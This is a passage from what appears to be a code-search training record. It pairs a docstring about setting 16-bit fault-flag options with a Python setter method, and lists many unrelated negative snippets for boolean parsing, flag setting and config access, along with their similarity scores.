"def writeAttributeBool(self, *args):\n return _libsbml.XMLOutputStream_writeAttributeBool(self, *args)",
"def add_boolean(self, name, **kwargs):\n self.add(Flags.BooleanFlag(name, **kwargs))",
"def getBoolValue(self):\n return _libsbml.ConversionOption_getBoolValue(self)",
"def getSetBoolean(self, key: str, default: bool | None = None) -> bool:\n value = self.parsedConfig.getboolean(key, default)\n self.parsedConfig[key] = str(value)\n return value",
"def virtual_flag(self, value):\n if not isinstance(value, bool):\n raise TypeError(\"virtual_flag must be bool.\")\n self._virtual_flag = value",
"def Bool(arg):\n return arg.lower() in ('y', 'true', 't', '1')",
"def str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def test_set_boolean(self):\n setting_name = 'project_bool_setting'\n url = reverse(\n 'projectroles:api_project_setting_set',\n kwargs={'project': self.project.sodar_uuid},\n )\n post_data = {\n 'app_name': EX_APP_NAME,\n 'setting_name': setting_name,\n 'value': True,\n }\n response = self.request_knox(url, method='POST', data=post_data)\n self.assertEqual(response.status_code, 200, msg=response.content)\n obj = AppSetting.objects.get(name=setting_name, project=self.project)\n self.assertEqual(obj.get_value(), True)",
"def boolean(self, boolean):\n\n self._boolean = boolean",
"def bool_on_off(value):\n return 'on' if value else 'off'",
"def set_signal_active(self, bool_value):\n self.chkbtn_signal_active.set(bool_value)",
"def set_simple(value):\r\n LogOptions._SIMPLE = bool(value)",
"def restricted_bool(x):\n try:\n x = bool(x)\n except ValueError:\n raise argparse.ArgumentTypeError(\"%r not a bool literal\" % (x,))\n return x",
"def get_bool(self, name, default=False):\n return self.get_as(self.parse_bool, name, default, value_type=bool)",
"def set_flag(self, set_flag):\n\n self._set_flag = set_flag",
"def read_boolean_option(config, section, option):\n if not config.has_section(section):\n return\n\n return config.has_option(section, option)",
"def boolean(self, label, component, config, name, default=False):\n\n default = self.setting(config, name, default)\n return st.checkbox(label, value=default, key=component + name)",
"def writeBoolean(self, value: bool):\n self.writeByte(1 if value else 0)",
"def bool_flag(s):\n if s.lower() in FALSY_STRINGS:\n return False\n elif s.lower() in TRUTHY_STRINGS:\n return True\n else:\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag\")",
"def set_option(name, option):\n ffi.lib.LLVMPY_SetCommandLine(_encode_string(name),\n _encode_string(option))",
"def str2bool(v) -> bool:\n\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def parse_bool(bool_arg):\n if bool_arg.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif bool_arg.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise ValueError(f'Boolean argument expected. Got {bool_arg} instead.')",
"def setOption(self, name, value):\n petsc.optionsSetValue(name, value)\n return",
"def SetFlag(self, flag, option_state):\r\n \r\n state = self.state\r\n \r\n if option_state:\r\n state |= flag\r\n else:\r\n state &= ~flag\r\n\r\n self.state = state\r\n\r\n if flag in [self.buttonClose, self.buttonMaximize, self.buttonMinimize, self.buttonPin]:\r\n self.ResetButtons()\r\n \r\n return self",
"def flag_set(self, flag):\n if self.flags & flag != 0:\n return True\n else:\n return False",
"def test_get_value_bool(self):\n val = self.setting_bool.get_value()\n self.assertIsInstance(val, bool)\n self.assertEqual(val, True)",
"def test_get_value_bool(self):\n val = self.setting_bool.get_value()\n self.assertIsInstance(val, bool)\n self.assertEqual(val, True)",
"def get_attr_bool(self, name, default=False):\n v = self.get_attr(name)\n if v is None:\n return default\n if v.lower() in [\"t\", \"true\", \"y\", \"yes\", \"1\"]:\n return True\n else:\n return False",
"def _prep_bool_arg(arg):\n return bool(strtobool(str(arg)))",
"def get_bool(self, key, default):\n value = self.get(key, default)\n if isinstance(value, bool):\n return value\n return value.lower() in (\"true\", \"t\", \"yes\", \"y\")",
"def val(self, new_val: bool) -> None:\n if type(new_val) != bool:\n raise TypeError(f\"Invalid literal {new_val} with type '{new_val.__class__.__name__}' for parameter 'new_val'\")\n self._val: bool = new_val\n return",
"def set_value(self, item, value):\n super(t_8_Bit_Options, self).set_value(item, value)\n\n if(item == t_8_Bit_Options.BOOLEAN_CONFIG_1):\n self.set_bools(value, self.bools, t_8_Bit_Options.BIT_MAX)",
"def bool_value(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"bool_value\")",
"def on_off_bool(value):\n return value == 'on'",
"def test_getboolean_with_default(self):\n self.assertEqual(self.config.getboolean('advanced','p'),None)\n self.assertEqual(self.config.getboolean('advanced','p',True),True)",
"def set_option(k, v=\"True\"):\n if k == \"log\":\n OPTIONS_TABLE[k] = getattr(logging, v.upper(), None)\n elif k == \"backend\":\n OPTIONS_TABLE[k] = sdm_backends.Backends.get_backend_name(v)\n elif k == \"config\":\n OPTIONS_TABLE[k] = sdm_util.get_abs_path(v)",
"def set_option(self, dest, value, force=True):\r\n if hasattr(self._option_values, dest) and not force:\r\n return\r\n setattr(self._option_values, dest, value)",
"def str2bool(v):\n if v.lower() == 'true':\n return True\n elif v.lower() == 'false':\n return False\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def parse_bool(arg):\n if arg == 'True':\n return True\n elif arg == 'False':\n return False\n else:\n raise argparse.ArgumentTypeError(\"Expected 'True' or 'False'.\")",
"def is_bool(self):\n answer = self._call('is_bool')\n return answer.yes",
"def str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')"
] | [
"0.81047094",
"0.7505482",
"0.72757864",
"0.72743803",
"0.70943683",
"0.705241",
"0.70266336",
"0.70084757",
"0.6970434",
"0.6921304",
"0.6904598",
"0.68884057",
"0.6847308",
"0.6807809",
"0.67250526",
"0.6707975",
"0.6671484",
"0.664038",
"0.66249967",
"0.6597783",
"0.651423",
"0.65032226",
"0.6467936",
"0.64536244",
"0.64346325",
"0.6423603",
"0.6385956",
"0.63799703",
"0.636212",
"0.6358862",
"0.63382375",
"0.6336264",
"0.63281167",
"0.63273937",
"0.6322064",
"0.6310586",
"0.62914115",
"0.6268994",
"0.62598103",
"0.62272274",
"0.6226767",
"0.62248677",
"0.62077576",
"0.6181871",
"0.6151472",
"0.6138179",
"0.61309224",
"0.61262757",
"0.6112616",
"0.61059684",
"0.60956436",
"0.60815",
"0.6065185",
"0.6057164",
"0.60273063",
"0.6021811",
"0.60124916",
"0.60037017",
"0.5995529",
"0.59951234",
"0.593159",
"0.59293365",
"0.5928432",
"0.5922593",
"0.59152263",
"0.58977544",
"0.5894333",
"0.5887994",
"0.5887036",
"0.5880179",
"0.5872852",
"0.5868595",
"0.58626956",
"0.58602226",
"0.585622",
"0.585152",
"0.5847893",
"0.58343893",
"0.5832523",
"0.580831",
"0.5808267",
"0.5806948",
"0.57901365",
"0.5779698",
"0.57780004",
"0.57780004",
"0.5768884",
"0.57676816",
"0.5766831",
"0.57611686",
"0.5751903",
"0.57467055",
"0.57390195",
"0.5735766",
"0.5732144",
"0.5725484",
"0.5723149",
"0.5706481",
"0.56815565",
"0.567936",
"0.567936"
] | 0.0 | -1 |
Set the value. (And calls the base class) This will also check for Options to set the bools. FAULTS_ACTIVE FAULTS_CURRENT >>> BIT_FAULT_PROBE = 0 >>> BIT_FAULT_OVERTEMP = 1 >>> BIT_FAULT_PANEL_OPEN = 2 >>> BIT_FAULT_HIGH_VOLTAGE = 3 >>> BIT_FAULT_RAM_CRC = 4 >>> BIT_FAULT_EEPROM_CRC = 5 >>> BIT_FAULT_GPIO_ERROR = 6 >>> BIT_FAULT_LTFAULT_ERROR = 7 >>> BIT_FAULT_TRIGGER_ERROR = 8 >>> BIT_FAULT_HARDWARE_EXC = 9 >>> BIT_FAULT_TRIGGER_GLITCH = 10 >>> BIT_FAULT_OVERVOLTAGE = 11 >>> BIT_FAULT_TEMP_SENSOR = 12 | def set_value(self, item, value):
super(t_16_Bit_Options, self).set_value(item, value)
if(item == t_16_Bit_Options.FAULT_ACTIVE):
self.set_bools(value, self.faults_current, t_16_Bit_Options.BIT_FAULT_MAX )
if(item == t_16_Bit_Options.FAULT_LATCHED):
self.set_bools(value, self.faults_latched, t_16_Bit_Options.BIT_FAULT_MAX ) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def set(self, value): # interface for BlueSky plans\n if str(value).lower() not in (\"fly\", \"taxi\", \"return\"):\n msg = \"value should be either Taxi, Fly, or Return.\"\n msg + \" received \" + str(value)\n raise ValueError(msg)\n\n if self.busy.value:\n raise RuntimeError(\"spin is operating\")\n\n status = DeviceStatus(self)\n \n def action():\n \"\"\"the real action of ``set()`` is here\"\"\"\n if str(value).lower() == \"taxi\":\n self.taxi()\n elif str(value).lower() == \"fly\":\n self.pre_fly()\n self.fly()\n self.post_fly()\n elif str(value).lower() == \"return\":\n self.motor.move(self.return_position)\n\n def run_and_wait():\n \"\"\"handle the ``action()`` in a thread\"\"\"\n self.busy.put(True)\n action()\n self.busy.put(False)\n status._finished(success=True)\n \n threading.Thread(target=run_and_wait, daemon=True).start()\n return status",
"def set_value(self, item, value):\n super(t_8_Bit_Options, self).set_value(item, value)\n\n if(item == t_8_Bit_Options.BOOLEAN_CONFIG_1):\n self.set_bools(value, self.bools, t_8_Bit_Options.BIT_MAX)",
"def set_overflow_status(self, value):\n TikCheckUtil.check_equality(\n get_soc_name(), ASCEND_910,\n \"this api doesn't support version: %s\" % get_soc_name())\n TikCheckUtil.check_type_match(\n value, int, \"value should be Int, \"\n \"invalid type: {}\".format(type(value)))\n TikCheckUtil.check_in_range(\n value, range(_MAX_OVERFLOW_STATUS),\n \"value should be 0 or 1, invalid value: {}\".format(value))\n with self.new_scope():\n self.emit(\n tvm.call_extern(\"uint64_t\", \"set_overflow\",\n type_convert(Expr(value, dtype=\"uint64\"))),\n ONE_IR)",
"def fault_debug(value: bool = False) -> None:",
"def set_flag(self, flag_name, value):\n flags = {'C':0, # Carry\n 'Z':1, # Zero\n 'I':2, # Interrupt mask\n 'D':3, # Decimal\n 'B':4, # Break\n 'V':6, # Overflow\n 'N':7} # Negative\n\n flag_reg = self.get_register('P')\n if value == 1:\n new_flag = flag_reg | 1 << flags[flag_name]\n else:\n new_flag = flag_reg & ~(1 << flags[flag_name])\n\n self.set_register('P', new_flag)",
"def _setEnumFeature(self, valueToSet):\n\n errorCode = VimbaDLL.featureEnumSet(self._handle,\n self._name,\n valueToSet)\n if errorCode != 0:\n raise VimbaException(errorCode)",
"def test_set_invalid_value(self):\n result = self.runner.invoke(\n cli,\n [\n *CLI_LOG_OPTION,\n \"config\",\n \"set\",\n \"agent.agent_name\",\n \"true\",\n \"--type=bool\",\n ],\n standalone_mode=False,\n )\n assert result.exit_code == 1",
"def _setIntFeature(self, valueToSet):\n\n errorCode = VimbaDLL.featureIntSet(self._handle,\n self._name,\n valueToSet)\n if errorCode != 0:\n raise VimbaException(errorCode)",
"def setFlag(self, flag, value) -> None:\n ...",
"def _setBoolFeature(self, valueToSet):\n\n errorCode = VimbaDLL.featureBoolSet(self._handle,\n self._name,\n valueToSet)\n if errorCode != 0:\n raise VimbaException(errorCode)",
"def set_value (self):\n raise NotImplementedError",
"def value(self, value):\n if self.value == value: # case where we are setting at the same value\n return\n if (not self.has_data) or self.is_unknown or self.is_byte:\n if not ida_bytes.patch_byte(self.ea, value):\n raise RuntimeError(\"Unable to patch value: {}\".format(self))\n elif self.is_word:\n if not ida_bytes.patch_word(self.ea, value):\n raise RuntimeError(\"Unable to patch value: {}\".format(self))\n elif self.is_dword:\n if not ida_bytes.patch_dword(self.ea, value):\n raise RuntimeError(\"Unable to patch value: {}\".format(self))\n elif self.is_qword:\n if not ida_bytes.patch_qword(self.ea, value):\n raise RuntimeError(\"Unable to patch value: {}\".format(self))\n else:\n raise RuntimeError(\"Unable to patch value: {}\".format(self))",
"def fset(self, value):\n message = \"Overriding a constant value is an illegal operation: {0} = {1}.\".format(\n name.__name__,\n value)\n raise TypeError(message)",
"async def set_bit(self, instance, value):\n print(f\"Server: {'set_bit'} Got 'put' request from outside: new value is {value} and type {type(value)}\")\n if self.device is not None:\n self.device.set_bit_server(value)\n else:\n print('device is None')",
"def set_value(self, value):\n if self.value:\n raise ValueError(\"Already has a Value:\", self)\n\n self.value = value\n\n if self.value != 0:\n self.possible = None\n self.solved = True",
"def Set(self,value):\n if value:\n onoff = 0x01\n else:\n onoff = 0x00\n self.Bus.Write_uInt8(self.Address,0x20+self.Pin, onoff)",
"def set_n(self, value):\n\n # set the negative register if greater than 0x80\n self.p &= ~(const.FLAG_NEGATIVE)\n self.p |= const.FLAG_NEGATIVE if value >= 0x80 else 0b0",
"def set_state(self, value):\n _LOGGER.debug(\"%s: Set state to %d\", self.entity_id, value)\n self._flag_state = True\n\n params = {ATTR_ENTITY_ID: self.entity_id}\n if value == 0:\n if self.char_current_state.value != value:\n self.char_current_state.set_value(3)\n self.call_service(DOMAIN, SERVICE_OPEN_COVER, params)\n elif value == 1:\n if self.char_current_state.value != value:\n self.char_current_state.set_value(2)\n self.call_service(DOMAIN, SERVICE_CLOSE_COVER, params)",
"def setFlag(self, whichFlag, whichValue):\n \n try:\n if self.__debugOn == True:\n print(\"Flags in: %x\" %self.__flags)\n \n # Get temproary flag value that blanks out the flag.\n tFlag = (~whichFlag) & self.__flags\n \n # Set our flag to the given value.\n self.__flags = tFlag | whichValue\n \n if self.__debugOn == True:\n print(\"Flags out: %x\" %self.__flags)\n \n except:\n raise\n \n return",
"def set_test_expectations(self, security_flag, is_flaky,\n unsymbolized_crash_state):\n self.expected_security_flag = security_flag\n self.is_flaky = is_flaky\n self.expected_state = unsymbolized_crash_state",
"def set_heat(self, state: bool, value: int = 0):\r\n if state:\r\n self.msg_send_upr.data[0] = b\"\\x22\"[0]\r\n self.msg_send_upr.data[2:4] = value.to_bytes(2, \"little\")\r\n else:\r\n self.msg_send_upr.data[0] = b\"\\x23\"[0]\r\n self.send_and_flush(self.msg_send_upr)",
"def light(self, value: bool | int, /) -> None:",
"def test_set_fails_when_setting_non_primitive_type(self):\n with pytest.raises(\n ClickException, match=\"Attribute `behaviours` is not allowed to be updated!\"\n ):\n self.runner.invoke(\n cli,\n [*CLI_LOG_OPTION, \"config\", \"set\", \"skills.dummy.behaviours\", \"value\"],\n standalone_mode=False,\n catch_exceptions=False,\n )",
"def fungible(self, value):\n if value is not None:\n self._fungible = True if value else False",
"def eflags_set(self, bit: int, value: bool) -> None:\n if self.eflags_get(bit):\n if not value:\n self.eflags &= ~(1 << bit)\n else:\n if value:\n self.eflags |= 1 << bit",
"def set_wraperror(self, value: bool = True) -> None:\n self.WRAPERROR = tools.coerce_bool(value)",
"def set_power_management(value: int) -> None:",
"async def bit(self, instance, value):\n print(f\"Server: {'bit'} Got 'put' request from outside: new value is {value} and type {type(value)}\")\n if self.device is not None:\n self.device.set_bit_client(value)\n else:\n print('device is None')",
"def set_bitmask(self, value):\r\n self.__bitmask__ = value | 0xFF00",
"def _set_value(self, value, name, option):\r\n self.set_value(name, option, value)",
"def flag(instance, attribute, value):\n if value not in [True, False, 1, 0, '1', '0']:\n raise ValueError(\"{} must only True, False, 1, 0, '1' or '0'\".format(attribute.name))",
"def set_custom_value(self, value):\n self.logger.info(\"Set custom value : %s\" % value)\n\n try:\n self._answer_payload['custom_value'] = value\n except Exception as e:\n self.logger.error(\"Error on set custom variables : %s\" % e)",
"def set_state(self, value, reason, data=None):\r\n return self.connection.set_alarm_state(self.name, reason, value, data)",
"def set_bool_value(self, event):\n\n self.undo_add()\n\n key_list = list(self.patch.engine.misc_data.keys())\n key = key_list[self.selected_index]\n data = self.patch.engine.misc_data[key]\n\n if self.ValueEnabled.GetValue():\n self.patch.misc[key] = data['on']\n else:\n self.patch.misc[key] = data['off']\n\n self.is_modified(True)\n self.misclist_update_row(self.selected_index)",
"def set_interrupt_polarity(self, value):\n\n if value == 0:\n self.__ioconfig = self.__helper.updatebyte(self.__ioconfig, 1, 0)\n self.__bus.write_byte_data(\n self.__ioaddress, self.IOCON, self.__ioconfig)\n if value == 1:\n self.__ioconfig = self.__helper.updatebyte(self.__ioconfig, 1, 1)\n self.__bus.write_byte_data(\n self.__ioaddress, self.IOCON, self.__ioconfig)\n return",
"def test_preprocessing_status_setter_valueerror(self):\n with self.assertRaises(ValueError):\n self.tester.preprocessing_status = 'not a valid state'",
"def set(self, value):\n # We can't store the values in the given format, we need to convert\n # them in string first. We also need to validate the value type.\n\n parser_map = {\n 'integer': int,\n 'numeric': float,\n 'date': dateutil_parser.parse,\n 'datetime': dateutil_parser.parse,\n 'keyboardshortcut': json.dumps\n }\n\n error_map = {\n 'keyboardshortcut': 'keyboard shortcut'\n }\n\n try:\n if self._type in ('boolean', 'switch', 'node'):\n assert isinstance(value, bool)\n elif self._type == 'options':\n has_value = next((True for opt in self.options\n if 'value' in opt and opt['value'] == value),\n False)\n assert (has_value or (self.select2 and self.select2['tags']))\n elif self._type == 'date':\n value = parser_map[self._type](value).date()\n else:\n value = parser_map.get(self._type, lambda v: v)(value)\n if self._type == 'integer':\n value = self.normalize_range(value)\n assert isinstance(value, int)\n if self._type == 'numeric':\n value = self.normalize_range(value)\n assert (\n isinstance(value, int) or isinstance(value, float) or\n isinstance(value, decimal.Decimal))\n except Exception as e:\n current_app.logger.exception(e)\n return False, gettext(\n \"Invalid value for {0} option.\".format(\n error_map.get(self._type, self._type)))\n\n pref = UserPrefTable.query.filter_by(\n pid=self.pid\n ).filter_by(uid=current_user.id).first()\n\n value = \"{}\".format(value)\n if pref is None:\n pref = UserPrefTable(\n uid=current_user.id, pid=self.pid, value=value\n )\n db.session.add(pref)\n else:\n pref.value = value\n db.session.commit()\n\n return True, None",
"def setValue(self, key, val):\n if key == 'active':\n self.active = val\n else:\n super(CREBundleDiagnosticPolicy, self).setValue(key, val)",
"def initial_status(self, value):\n\n if not isinstance(value, Real):\n raise TypeError(\"Value for initial_status shoulde be real numbers.\")\n\n if isclose(value, 0):\n raise ValueError(\"Value for initial_status cannot be zero.\")\n\n self._initial_status = value",
"def setValue(self, value):\r\n # Clamp values to [0,1]\r\n self.__value = max(0, min(value, 1))",
"def Set(self,value):\n self.Bus.Write_uInt8(self.Address,0x50+self.Pin,value)",
"def set_machine_fan(self, val):\n if val > self.max_fan or val < 0:\n logger.error(\"/dev/ttyUSB{0} tried setting Fan speed {1}%\"\n .format(self.dev_id, val)\n )\n return False\n try:\n self._write(chr(self.incoming_fan))\n sleep(0.5)\n self._write(chr(val))\n return True\n except:\n logger.error(\"Cannot set Fan speed for /dev/ttyUSB{0}\"\n .format(self.dev_id)\n )\n return False",
"def _setVals(self, outcome=0):\n self.outcome = outcome",
"def set(self, param, value):\r\n # continuous testing of inputs\r\n if self.testing_unit.testing_level > 1 and not self.testing_unit.c_test_set_inp(param, value):\r\n raise ValueError(\"set won't run, input's aren't valid.\")\r\n\r\n # continuous testing of functional inputs\r\n if self.testing_unit.testing_level > 0:\r\n if param in [\"weighting_bias\"]:\r\n if not [self.testing_unit.c_test_weighting_bias][[\"weighting_bias\"].index(param)](value):\r\n raise ValueError(\"Bad \" + param + \" input. See log or raise testing verbosity.\")\r\n\r\n self.__locals[param] = value # Security Risk\r\n return 1 # Success\r",
"def set_system_state(self, chksum, ack, FPGAhold, FPGAcom):\n byte = 0\n if chksum:\n byte |= (1 << 6)\n if ack:\n byte |= (1 << 4)\n if FPGAhold:\n byte |= (1 << 1)\n if FPGAcom:\n byte |= (1 << 0)\n self.system_state = byte",
"def set_value(self,x):\n self._value = x",
"def set_value(self,x):\n self._value = x",
"def set_byte(ea, value):\n if not ida_bytes.patch_byte(ea, value):\n raise RuntimeError(\"Unable to set value {} at {}\".format(ea, value))",
"def set_interrupt_defaults(self, port, value):\n\n if port == 0:\n self.__bus.write_byte_data(self.__ioaddress, self.DEFVALA, value)\n else:\n self.__bus.write_byte_data(self.__ioaddress, self.DEFVALB, value)\n return",
"async def _hardcore_setheist(self, ctx):\r\n guild = ctx.guild\r\n config = await self.thief.get_guild_settings(guild)\r\n\r\n if config[\"Hardcore\"]:\r\n config[\"Hardcore\"] = False\r\n msg = \"Hardcore mode now OFF.\"\r\n else:\r\n config[\"Hardcore\"] = True\r\n msg = \"Hardcore mode now ON! **Warning** death will result in credit **and chip wipe**.\"\r\n await self.thief.config.guild(guild).Config.set(config)\r\n await ctx.send(msg)",
"def test_set_value_invalid(self):\r\n name = 'option1'\r\n option = self.config.options[name]\r\n value = 'invalid'\r\n initial_value = self.config.values[name]\r\n\r\n self.assertRaises(InvalidOptionValueError, self.config.set_value, name, option, value)\r\n self.assertEqual(self.config.values[name], initial_value)",
"def set_value(self, value):\n self.value = value",
"def set_value(self, value):\n self.value = value",
"def set_value(self, value):\n self.value = value",
"def __setitem__(self, key, value):\n\n if key not in self.options:\n raise KeyError(\"Invalid option '%s'.\" % key)\n elif 'enums' in self._moptions[key] and value not in self._moptions[key]['enums']:\n raise ValueError(\"Value ('%s') is not one of %s\" % (value, repr(self._moptions[key]['enums'])))\n elif self._moptions[key]['type'] == 'bool' and not isinstance(value, bool):\n raise TypeError(\"Value must be a boolean not '%s'\" % type(value).__name__)\n elif self._moptions[key]['type'] in ['integer', 'float'] and not isinstance(value, Number):\n raise TypeError(\"Value must be an integer not '%s'\" % type(value).__name__)\n self._runopts[key] = value",
"def set_contrast(self, value):\n assert 0x80 <= value <= 0xff, \"contrast value must be between 0x80 and 0xff\"\n self.command([0x21, self.TEMP_COEFF_2, self.BIAS_1_7, value, 0x20, self.DISPLAY_NORMAL])\n # 0x21 - enter extended instruction set (H=1)\n # 0x06 - set temperature coefficient 2\n # 0x14 - set BIAS system to n=3 (recomm. mux rate 1:40/1:34)\n # value - (80-ff) - set Vop (80 = 3.00V, ff = 10.68V), 8b seems to work (0x3b/d70: 3.00+(70*0.06)=7.2V)\n # 0x20 - back to basic instruction set\n # 0x0c - normal display mode",
"def __setitem__(self, key, value):\n raise KeyError(\"Not able to set '%s' enum directly in the '%s' bit field!\"\n \" Try to use add_enums() method.\" % (key, self.name))",
"def set_vector_value(self, which_vector, task_num, value):\n # unused helper function\n if which_vector == 'alive':\n self.is_task_alive[0][task_num] = value\n if which_vector == 'enabled_temporal':\n self.is_task_enabled[0][task_num] = value\n if which_vector == 'finished':\n self.is_task_finished[0][task_num] = value\n if which_vector == 'enabled_travel':\n self.travel_time_constraint_satisfied[0][task_num] = value",
"def __init__(__self__, *,\n crashed: bool,\n device_out_of_memory: bool,\n failed_roboscript: bool,\n not_installed: bool,\n other_native_crash: bool,\n timed_out: bool,\n unable_to_crawl: bool):\n pulumi.set(__self__, \"crashed\", crashed)\n pulumi.set(__self__, \"device_out_of_memory\", device_out_of_memory)\n pulumi.set(__self__, \"failed_roboscript\", failed_roboscript)\n pulumi.set(__self__, \"not_installed\", not_installed)\n pulumi.set(__self__, \"other_native_crash\", other_native_crash)\n pulumi.set(__self__, \"timed_out\", timed_out)\n pulumi.set(__self__, \"unable_to_crawl\", unable_to_crawl)",
"def set_test_afc_val(self):\r\r\n\r\r\n MAX_NUM_AGC_ITER = 10\r\r\n MAX_CHANGE = 2000\r\r\n afc_per_hz = 0.28 #Reasonable starting factor\r\r\n\r\r\n func_name = sys._getframe(0).f_code.co_name\r\r\n loggerDisplay = logging.getLogger(__name__ + func_name)\r\r\n afc_val = self.modemObj.get_afc_val()\r\r\n assert(afc_val is not None)\r\r\n afc_val = int(afc_val)\r\r\n loggerDisplay.info('Current afc value is %s' %afc_val)\r\r\n freq_err_Hz, freq_err_lim_str = self.get_freq_err_info_tuple()\r\r\n\r\r\n iteration = 0\r\r\n while freq_err_lim_str.upper() != \"OK\" and iteration < MAX_NUM_AGC_ITER:\r\r\n if freq_err_lim_str.upper() not in ['ULEL', 'NMAU', 'ULEU', 'NMAL']:\r\r\n loggerDisplay.info('Unexpected response; %s' %freq_err_lim_str.upper())\r\r\n loggerDisplay.info('Will continue with current afc value')\r\r\n break\r\r\n\r\r\n afc_change = int(freq_err_Hz * afc_per_hz)\r\r\n afc_change = min(afc_change, MAX_CHANGE)\r\r\n afc_change = max(afc_change, -MAX_CHANGE)\r\r\n afc_val += afc_change\r\r\n\r\r\n self.modemObj.set_afc_val(afc_val)\r\r\n loggerDisplay.info('Iteration %s' %(iteration+1))\r\r\n loggerDisplay.info(\"freq_err_Hz=%s, %s will try with new AFC value %s change %s\"\r\r\n %(freq_err_Hz, self.evm.dictKeysValidLim[freq_err_lim_str], afc_val, afc_change))\r\r\n old_freq_err_Hz = freq_err_Hz\r\r\n freq_err_Hz, freq_err_lim_str = self.get_freq_err_info_tuple()\r\r\n try:\r\r\n afc_per_hz = afc_change/(old_freq_err_Hz-freq_err_Hz)\r\r\n except ZeroDivisionError:\r\r\n afc_per_hz = 0.2\r\r\n if afc_per_hz < 0:\r\r\n afc_per_hz = 0.2 #It got worse, go back to something safe\r\r\n if afc_per_hz > 1:\r\r\n afc_per_hz = 1\r\r\n loggerDisplay.debug(\"afc_per_hz=%s\" %(afc_per_hz))\r\r\n iteration += 1\r\r\n\r\r\n if iteration < MAX_NUM_AGC_ITER:\r\r\n loggerDisplay.info(\"Carrier Frequency Error %s is within the required tolerance, Converged AFC value is %s after %s iterations\"\r\r\n %(freq_err_Hz, afc_val, iteration))\r\r\n else:\r\r\n loggerDisplay.info(\"Carrier Frequency Error %s is outside the required tolerance after %s iterations\"\r\r\n %(freq_err_Hz, iteration))\r\r\n loggerDisplay.info(\"Will use AFC value %s\" %afc_val)\r\r\n raise ExGeneral(\"Fail: AFC correction did not converge to a frequency error within tolerance.\")",
"def state(self, value, duration=None):\n if value in ['off', 'OFF', '0']:\n self.off()\n if value in ['on', 'ON', '1']:\n self.on(duration)",
"def setValue(self,val):\n if val:\n self.input.setValue(val)",
"async def _opt_set(self, ctx, option, value):\n try:\n guild_options = self.database.get_guild_options(ctx.guild.id)\n cur_val = getattr(guild_options, option)\n if isinstance(cur_val, (int, bool)):\n if value.upper() == \"ALLOW\" or value.upper() == \"TRUE\":\n value = True\n elif value.upper() == \"FORBID\" or value.upper() == \"FALSE\":\n value = False\n else:\n await ctx.send(\"Sorry, that option only accepts true or false values.\")\n return\n if isinstance(cur_val, str):\n value = utils.replace_escapes(value)\n setattr(guild_options, option, value)\n self.database.save_item(guild_options)\n await ctx.send(f\"Option {option} set to `{value}`\")\n except AttributeError:\n await ctx.send(\"I don't recognize that option.\")",
"def set_State(self, value):\n super(AddressValidationInputSet, self)._set_input('State', value)",
"def check_value(self, value):\n value = super().check_value(value)\n if value == self.states_enum.OUT and self.interlocked:\n raise InterlockError('Valve is currently forced closed')\n return value",
"def mark_error(self):\r\n self.status = ERROR",
"def _check_vals(self):\n\n try:\n self.is_set = True\n self.pack()\n except Exception as err:\n # Set default values again\n raise ValueError(\"Invalid arguments. Could not packed since: {}\".format(err))\n self.__init__()",
"def test_setFlags(self):\n self._flagsTest('setFlags', b'FLAGS')",
"def set_value(self, key, value=None,\n options=None, option_index=None, hidden=None):\n if key not in self:\n self.set_param(key, value,\n options=options,\n option_index=option_index)\n if options is not None:\n self[key]['options'] = options\n if value is None and option_index is None:\n option_index = self[key]['option_index']\n if option_index is not None:\n value = self[key]['options'][option_index]\n self[key]['option_index'] = option_index\n elif value is not None and self[key]['options'] is not None:\n try:\n option_index = self[key]['options'].index(value)\n self[key]['option_index'] = option_index\n except ValueError:\n pass\n elif self[key]['dtype'] == 'bool':\n if str(value).lower().strip() in FALSY:\n value = False\n else:\n value = True\n self[key]['value'] = value\n if hidden is not None:\n self[key]['hidden'] = hidden",
"async def set_init(self, value: int | float) -> bool:\n return await self.set_value(value, True)",
"def _setindicator(self, index: int, value: bool) -> None:\n bitmask = 1 << (index + 1)\n current = self._get_buffer(0x04)\n if value:\n self._set_buffer(0x04, current | bitmask)\n else:\n self._set_buffer(0x04, current & ~bitmask)\n if self._auto_write:\n self.show()",
"def reset_myself(self):\n print >>sys.stderr, 'UNEXPECTED VALUE'\n self.status = Modem.Status.IDLE\n self.error_status = Modem.ErrorDict.NONE",
"def setHack(self, pin, value, board=0):\n msg = [int(pin), int(value)]\n return self.callModule('hackp', board, 0, 'write', msg)",
"def set_value(self,parameter_number,value):\n code = int(\"01100000\",2) | parameter_number\n command = pack('<BH',code,int(rint(value)))\n reply = self.query(command = command,ser = self.ser, count=1)\n if len(reply) != 1:\n warn(\"expecting 1, got %d bytes\" % len(reply)); return\n reply_code, = unpack('B',reply)\n if reply_code != code: warn(\"expecting 0x%X, got 0x%X\" % (code,reply_code))",
"def set_LED(name,light,value): #TODO UID convert to int\n name = _lookup(name)\n assert light in range(1,5), \"Error: light number must be an Integer between 1 and 4 inclusive\"\n assert value in range(4),\"Error: value must be an integer between 0 and 3 inclusive\"\n flag_data = list(name) + [-1,-1,-1,-1]\n flag_data[light] = value\n mc.set('flag_values',flag_data)",
"def set(self, attr, value=True):\n if type(value) == bool:\n self.__dict__['_'+attr] = value\n print attr, \"set to\", value\n else:\n print 'Value must be a bool, either \"True\" or \"False\" (no quotes)!'",
"def set_contrast(value):\n command([0x21, 0x14, value, 0x20, 0x0c])",
